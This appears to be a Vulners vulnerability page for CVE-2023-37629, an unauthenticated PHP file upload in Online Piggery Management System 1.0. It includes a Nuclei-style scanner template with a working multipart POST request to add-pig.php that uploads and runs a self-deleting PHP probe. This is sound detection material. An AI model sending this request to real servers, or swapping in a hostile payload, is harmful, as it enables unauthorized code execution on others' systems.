| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Online Piggery Management System v1.0 - unauthenticated file upload Vulnerability | 19 Jul 202300:00 | – | zdt | |
| Exploit for SQL Injection in Simple_Online_Piggery_Management_System_Project Simple_Online_Piggery_Management_System | 9 Sep 202307:37 | – | githubexploit | |
| CVE-2023-37629 | 12 Jul 202317:15 | – | attackerkb | |
| CVE-2023-37629 | 12 Jul 202320:26 | – | circl | |
| Online Piggery Management System 代码问题漏洞 | 12 Jul 202300:00 | – | cnnvd | |
| Online Piggery Management System Arbitrary File Upload Vulnerability | 14 Jul 202300:00 | – | cnvd | |
| CVE-2023-37629 | 12 Jul 202300:00 | – | cve | |
| CVE-2023-37629 | 12 Jul 202300:00 | – | cvelist | |
| Online Piggery Management System v1.0 - unauthenticated file upload vulnerability | 19 Jul 202300:00 | – | exploitdb | |
| CVE-2023-37629 | 12 Jul 202317:15 | – | nvd |
id: CVE-2023-37629
info:
name: Online Piggery Management System v1.0 - Unauthenticated File Upload
author: Harsh
severity: critical
description: |
Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
Successful exploitation of this vulnerability could result in unauthorized access to the system, data leakage, or even complete compromise of the affected server.
reference:
- https://www.exploit-db.com/exploits/51598
- https://nvd.nist.gov/vuln/detail/CVE-2023-37629
- https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
- https://github.com/1337kid/Piggery_CMS_multiple_vulns_PoC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37629
cwe-id: CWE-434
epss-score: 0.15033
epss-percentile: 0.96316
cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: simple_online_piggery_management_system_project
product: simple_online_piggery_management_system
tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project,vuln
variables:
string: "CVE-2023-37629"
http:
- raw:
- |
POST /pig/add-pig.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="pigno"
pig-fms-100
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="weight"
65465
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="arrived"
{{date_time("%Y-%M-%D")}}
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="gender"
female
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="status"
active
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="breed"
2
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="remark"
4fwefwe
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
Content-Type: application/x-php
<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="submit"
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(content_type, "text/html")'
- 'contains(body, "successfully created")'
condition: and
# digest: 4b0a00483046022100a3cd7ae8f63ea52d39f4941e72872ed8761fc03b34c8fdf596369f29d894edb9022100d5e51be7fe53d70557756702a4461479d4ccabdccd3455837fc0bc200da513c6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation